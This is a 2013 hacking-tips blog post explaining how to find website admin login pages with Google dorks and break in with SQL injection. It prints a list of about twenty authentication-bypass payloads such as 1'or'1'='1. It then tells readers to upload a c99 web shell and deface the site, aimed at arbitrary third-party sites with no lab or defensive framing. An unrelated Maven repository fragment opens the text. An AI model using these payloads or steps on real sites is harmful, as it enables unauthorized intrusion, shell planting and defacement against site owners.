... net.sf.xss-html-filter xss-html-filter 1.1 xss-html-filter releases xss-html-filter Releases Repository http://xss-html-filter.sf.net/releases/ Computer Hacks and tricks: SQL Injection and Google dorks

Tuesday, December 17, 2013

SQL Injection and Google dorks

Sql injection can be done by using various tools like Acunetix, SQL helper, Havij. In one of my past tutorials I showed you how havij is used by the hackers to scan a website for vulnerability and then take advantage of the loop hole and gain access to the website. There are various methods of this technique and In this tutorial I will be describing a very basic and simple Structured Query Language Injection (SQLi). Aside from this let me also tell that SQL injection technique  is widely used by hackers. I am of the perception that 70% of the hacks on websites are done with SQL injection. In this tutorial we will come to know how to find the website’s admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When we enter into the admin panel what we have to do is to find a file upload option and just upload a shell there like c99 shell etc. and finally deface the same.

                                   Click Here to Download DORKS

By entering these dorks many of the sites will open up having /adminlogin.aspx in their URL.
 Select any website, you will get the admin panel of the said website. 
Fill the details as: 

User: 1'or'1'='1

Password: 1'or'1'='1 

Using the above mentioned login details and you will enter  into the admin panel of a website.It will not work for all the websites but this is what is called a basic sql injection?

Other injection queries like this:

‘ or 1=1 –
 ” or 0=0 –
 or 0=0 –
‘ or 0=0 #
” or 0=0 #
 or 0=0 #
‘ or ‘x’='x
” or “x”=”x
 ‘) or (‘x’='x
 ‘ or 1=1–
” or 1=1–
 or 1=1–
‘ or a=a–
 ” or “a”=”a
 ‘) or (‘a’='a
“) or (“a”=”a
 hi” or “a”=”a
 hi” or 1=1 –
 hi’ or 1=1 –
 hi’ or ‘a’='a
 hi’) or (‘a’='a
 hi”) or (“a”=”)

Hope you enjoyed this
Please subscribe or give a thumbs up if there is anything you want me to write or do a tutorial about please send me an email 
I am doing more useful tips and tutorials everyday so please come by to see if there is anything new when I get enough followers and views I will be giving out free stuff

No comments:

Post a Comment